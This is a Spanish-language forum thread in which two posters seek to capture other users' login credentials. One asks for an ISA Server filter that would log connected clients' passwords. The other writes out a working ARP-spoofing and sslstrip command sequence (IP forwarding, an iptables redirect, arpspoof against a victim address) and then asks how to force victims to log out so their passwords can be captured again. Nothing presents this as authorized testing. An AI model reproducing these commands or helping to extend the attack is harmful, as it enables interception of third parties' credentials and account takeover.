Temas

Buenas,
después de mucho indagar en linux sobre MITM y sus posibilidades me planteo una situación.

Quisiera saber sí existe algún script o filtro que se le aplique a Isa Server para monitorizar los login y passwords de los clientes conectados a el ya que el propio Isa Server se puede decir que hace de MITM. Se que existe cain y abel, pero ya que todo el tráfico pasa atraves del Isa Server he pensado que debería ser más fácil dado que actúa como una especie de proxy.

Thanks

Hola a todos, aunque llevo tiempo siguiendo este foro hoy he decidido poner en un hilo una cuestión que me trae de cabeza.

Llevo tiempo usando sslstrip para monitorizar las conexiones SSL y junto con arpspoof pues perfecto de la siguiente manera:

Código [Seleccionar] Expandir

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080


Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?. Con ettercap lo he hecho pero el problema es que ettercap no funciona nada bien con el sslstrip en backtrak. Me da el famoso error "send l3 error".

Gracias a todos.